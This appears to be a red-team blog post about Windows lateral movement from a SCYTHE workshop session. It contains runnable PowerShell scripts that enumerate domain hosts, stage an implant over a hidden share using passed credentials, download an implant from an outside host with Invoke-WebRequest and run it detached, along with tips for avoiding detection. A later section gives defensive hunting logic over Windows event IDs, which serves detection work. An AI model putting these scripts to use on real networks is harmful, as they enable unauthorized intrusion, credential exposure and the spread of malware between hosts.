Lateral movement remains one of the most critical (and often most frustrating) components of red team campaigns. During this recent "Threat Thursday Live" session, the team explored practical techniques for achieving lateral movement using native tools available in most Windows environments. This method, known as "Living Off the Land," minimizes the use of external tools and maximizes stealth and compatibility across various networks.
Why Lateral Movement Matters
As networks grow more complex with segmentation and security tooling, moving from one host to another (lateral movement) becomes essential for maintaining access and expanding control during red team operations. This session focused on how to achieve this within the SCYTHE platform using three practical, pre-validated methods that require only PowerShell remoting.
Method 1: Using Network Shares
Prerequisites
- PowerShell Remoting (PS Remoting) enabled on target systems.
- Knowledge of reachable hosts (enumerated with Get-ADComputer, then checked for a listening WinRM endpoint with Test-WSMan).
Steps
- Identify reachable machines using a PowerShell one-liner that queries Active Directory and checks for PS Remoting availability.
- Create a shared drive, if one doesn’t already exist. Use:
- Copy the implant to the shared drive using simple file operations.
- Map the shared drive on the remote system via net use.
- Copy the implant from the shared drive to a local path on the remote system.
- Execute the implant with CMD /C start so the process is detached and the remote command returns immediately instead of blocking until the implant exits.
Tip: Using existing shared drives reduces the need for creating artifacts and lowers the risk of detection.
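The six steps above as one runnable sequence. This is an added example written for this write-up, not code from the session or from the SCYTHE platform. It assumes PS Remoting (WinRM, TCP 5985) is enabled on the targets, the operator's account is a local administrator there, the implant sits at $Implant on the foothold, and the share, host and path names are placeholders.

```powershell
# Added example, not code from the session: Method 1 end to end.
# Assumptions: WinRM enabled on targets, local admin rights there, the implant
# staged at $Implant on this host; share, host and path names are placeholders.

$Implant   = 'C:\Staging\implant.exe'
$SharePath = 'C:\Staging'
$ShareName = 'Staging$'                       # hidden share; reuse an existing one if you can
$RemoteDst = 'C:\Windows\Temp\implant.exe'
$Cred      = Get-Credential 'CORP\ops.admin'  # only used for the net use inside the session

# 1. Enumerate enabled domain computers and keep the ones answering WinRM.
#    Get-ADComputer comes from the RSAT ActiveDirectory module.
$reachable = Get-ADComputer -Filter 'Enabled -eq $true' |
    ForEach-Object { $_.DNSHostName } |
    Where-Object { $_ -and (Test-WSMan -ComputerName $_ -ErrorAction SilentlyContinue) }

# 2. Create the share on the foothold only if it is missing: an existing share
#    means no share-creation event and one less artifact to clean up later.
if (-not (Get-SmbShare -Name $ShareName -ErrorAction SilentlyContinue)) {
    New-SmbShare -Name $ShareName -Path $SharePath -FullAccess $Cred.UserName | Out-Null
}
# 3. Stage the implant on the share with a plain file copy.
Copy-Item -Path $Implant -Destination $SharePath

$unc = "\\$env:COMPUTERNAME\$ShareName"
foreach ($target in $reachable) {
    Invoke-Command -ComputerName $target -ArgumentList $unc, $RemoteDst, $Cred -ScriptBlock {
        param($unc, $dst, $cred)
        # 4. Map the share. Credentials are passed explicitly because the remote
        #    session's Kerberos ticket cannot be forwarded on to a third host
        #    (the "second hop" problem). The cost: a 4648 explicit-credential
        #    logon on the target and the password on net.exe's command line.
        $user = $cred.UserName
        $pass = $cred.GetNetworkCredential().Password
        net use Z: $unc "/user:$user" $pass /persistent:no | Out-Null
        # 5. Copy the implant to a local path, then drop the mapping again.
        Copy-Item -Path 'Z:\implant.exe' -Destination $dst
        net use Z: /delete /y | Out-Null
        # 6. Detach with cmd /c start so this remote command returns at once
        #    instead of blocking until the implant exits.
        cmd /c start "" $dst
        # Returned to the operator as the success check for this host.
        [pscustomobject]@{ Host = $env:COMPUTERNAME; Staged = (Test-Path $dst) }
    }
}
```

Two notes on the mapping step, both outside what the session covered: New-PSDrive -Credential keeps the password off a process command line where net use does not, and on PowerShell 5.0 and later Copy-Item -ToSession pushes the file through the existing WinRM session, which removes both the share and the second-hop credential handling entirely.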
Method 2: Direct WGET via Info Command
This method simplifies the process by removing the need for shared drives.
Steps
- Use the info command to run a wget-style download (Invoke-WebRequest, which Windows PowerShell aliases as wget) on the remote system:
- Confirm file presence with Get-ChildItem.
- Start execution with CMD /C start.
This method leaves no share artifacts (no share creation or SMB access events on the foothold), which makes it the better fit where file transfer over shared drives is restricted or monitored. The trade-off is that the target itself has to reach the download server, so its egress filtering, proxy logs and TLS trust all come into play.
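The same three steps issued directly through Invoke-Command, as an added example that is not code from the session or the SCYTHE platform (the info command would run the inner script block on the implant's behalf). It assumes $target answers WinRM, the operator has local admin rights there, and the implant is served at the placeholder $Url over HTTPS with a certificate the target trusts.

```powershell
# Added example, not code from the session: Method 2, download and run, no share.
# Assumptions: WinRM enabled on $target, local admin rights there, the implant
# served at $Url (placeholder) with a certificate the target trusts.

$target = 'ws01.corp.example'
$Url    = 'https://files.example.com/implant.exe'
$Dst    = 'C:\Windows\Temp\implant.exe'

$result = Invoke-Command -ComputerName $target -ArgumentList $Url, $Dst -ScriptBlock {
    param($url, $dst)
    # Windows PowerShell 5.1 still defaults to older TLS on many builds; most
    # current servers refuse anything below TLS 1.2.
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

    # 1. wget-style fetch. "wget" and "curl" are aliases of Invoke-WebRequest in
    #    Windows PowerShell only (removed in PowerShell 6+), so use the cmdlet
    #    name. -UseBasicParsing avoids the Internet Explorer engine dependency.
    Invoke-WebRequest -Uri $url -OutFile $dst -UseBasicParsing

    # 2. Confirm the file landed; Get-ChildItem throws if it is missing.
    $file = Get-ChildItem -Path $dst -ErrorAction Stop

    # 3. Detach the implant so this command returns immediately.
    cmd /c start "" $dst

    [pscustomobject]@{ Host = $env:COMPUTERNAME; Path = $file.FullName; Bytes = $file.Length }
}
$result | Format-Table -AutoSize
```

Because the download is made by the target, not by the operator, a zero-byte or missing file at step 2 usually means the target's proxy or egress policy blocked it; check that before suspecting the implant.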
Security Implications and Detection Challenges
These methods rely on tools native to Windows (PowerShell, network shares, WinRS) and so leave none of the tool-specific artifacts that traditional security products key on. They exemplify "living off the land" by:
- Using no software beyond what Windows already ships, apart from the implant being delivered
- Blending into routine administration, since PS Remoting sessions, net use mappings and Invoke-WebRequest downloads are all things administrators do every day
- Producing only the telemetry that native logging already generates: a cmd.exe spawned by wsmprovhost.exe (Security 4688, with command-line auditing enabled), share access on the foothold (5140/5145), explicit-credential logons (4648) and the script text itself (PowerShell 4104 with script block logging). Defenders only see these if those logs are enabled and actually reviewed, which is what "under the radar" amounts to in practice.
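To show what the other side of this looks like, here is a first-pass hunt over the events the two methods leave behind. It is an added example, not code from the session, and it runs offline over a constructed sample set: the field names (Computer, ParentProcessName, CommandLine, ShareName, ScriptBlockText) are simplified stand-ins for the XML properties that Get-WinEvent returns for events 4688, 5140 and 4104, and the hostnames, users and timestamps are made up.

```powershell
# Added example, not code from the session: detection logic for the techniques above.
# Real input would come from
#   Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688,5140}
#   Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104}
# with the XML fields mapped onto the property names used here. 4688 carries a
# command line only when "Include command line in process creation events" is on.

function Get-LateralMovementIndicators {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        $hit = switch ($e.Id) {
            4688 {  # process creation: children of the PS Remoting host process
                if ($e.ParentProcessName -match 'wsmprovhost\.exe$' -and
                    $e.CommandLine -match '^\s*"?cmd(\.exe)?"?\s+/c\s+start\b') { 'cmd /c start spawned under WinRM' }
                elseif ($e.CommandLine -match '\bnet1?(\.exe)?\s+use\s+\S*\s*\\\\') { 'net use to a UNC path' }
            }
            4104 {  # script block logging: the download or share creation itself
                if ($e.ScriptBlockText -match 'Invoke-WebRequest|\biwr\b|\bwget\b') { 'web download in script block' }
                elseif ($e.ScriptBlockText -match 'New-SmbShare|\bnet\s+share\b') { 'share created in script block' }
            }
            5140 {  # network share accessed: hidden shares that are not the admin shares
                if ($e.ShareName -match '\$$' -and $e.ShareName -notmatch '^\\\\\*\\(IPC|ADMIN|[A-Z])\$$') { 'hidden non-admin share accessed' }
            }
        }
        if ($hit) {
            [pscustomobject]@{ Time = $e.Time; Computer = $e.Computer; Id = $e.Id; User = $e.User; Indicator = $hit }
        }
    }
}

# Constructed sample events (not real telemetry): one Method 1 run, one Method 2 run,
# plus a benign remote admin command that must not fire.
$SampleEvents = @(
    [pscustomobject]@{ Time='2024-03-07T10:00:58Z'; Computer='FOOTHOLD'; Id=5140; User='CORP\ops.admin'; ShareName='\\*\Staging$' }
    [pscustomobject]@{ Time='2024-03-07T10:01:00Z'; Computer='WS01'; Id=4688; User='CORP\ops.admin'
                       ParentProcessName='C:\Windows\System32\wsmprovhost.exe'
                       CommandLine='net use Z: \\FOOTHOLD\Staging$ /user:CORP\ops.admin ******** /persistent:no' }
    [pscustomobject]@{ Time='2024-03-07T10:01:02Z'; Computer='WS01'; Id=4688; User='CORP\ops.admin'
                       ParentProcessName='C:\Windows\System32\wsmprovhost.exe'
                       CommandLine='"cmd.exe" /c start "" C:\Windows\Temp\implant.exe' }
    [pscustomobject]@{ Time='2024-03-07T10:05:00Z'; Computer='WS02'; Id=4104; User='CORP\ops.admin'
                       ScriptBlockText='Invoke-WebRequest -Uri https://files.example.com/implant.exe -OutFile C:\Windows\Temp\implant.exe -UseBasicParsing' }
    [pscustomobject]@{ Time='2024-03-07T10:06:00Z'; Computer='WS03'; Id=4688; User='CORP\helpdesk'
                       ParentProcessName='C:\Windows\System32\wsmprovhost.exe'
                       CommandLine='"C:\Windows\System32\sc.exe" query wuauserv' }
)

Get-LateralMovementIndicators -Events $SampleEvents | Sort-Object Time | Format-Table -AutoSize
```

Run against the sample set this flags the share access, the net use, the detached cmd start and the script-block download, and stays quiet on the helpdesk sc.exe query. The signal that survives best in a real environment is the parent/child pair, wsmprovhost.exe spawning cmd.exe with start: administrators rarely do that through a remote session, whereas net use and Invoke-WebRequest on their own will need baselining against normal admin traffic.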
Final Thoughts
While these methods are not necessarily stealthy by default, they are adaptable and automation-friendly. With some tuning, they can become part of advanced, modular campaigns. Future sessions may expand on chaining these techniques with persistence methods or leveraging PS Web Access for even broader reach.
Join our upcoming sessions: https://scythe.io/workshops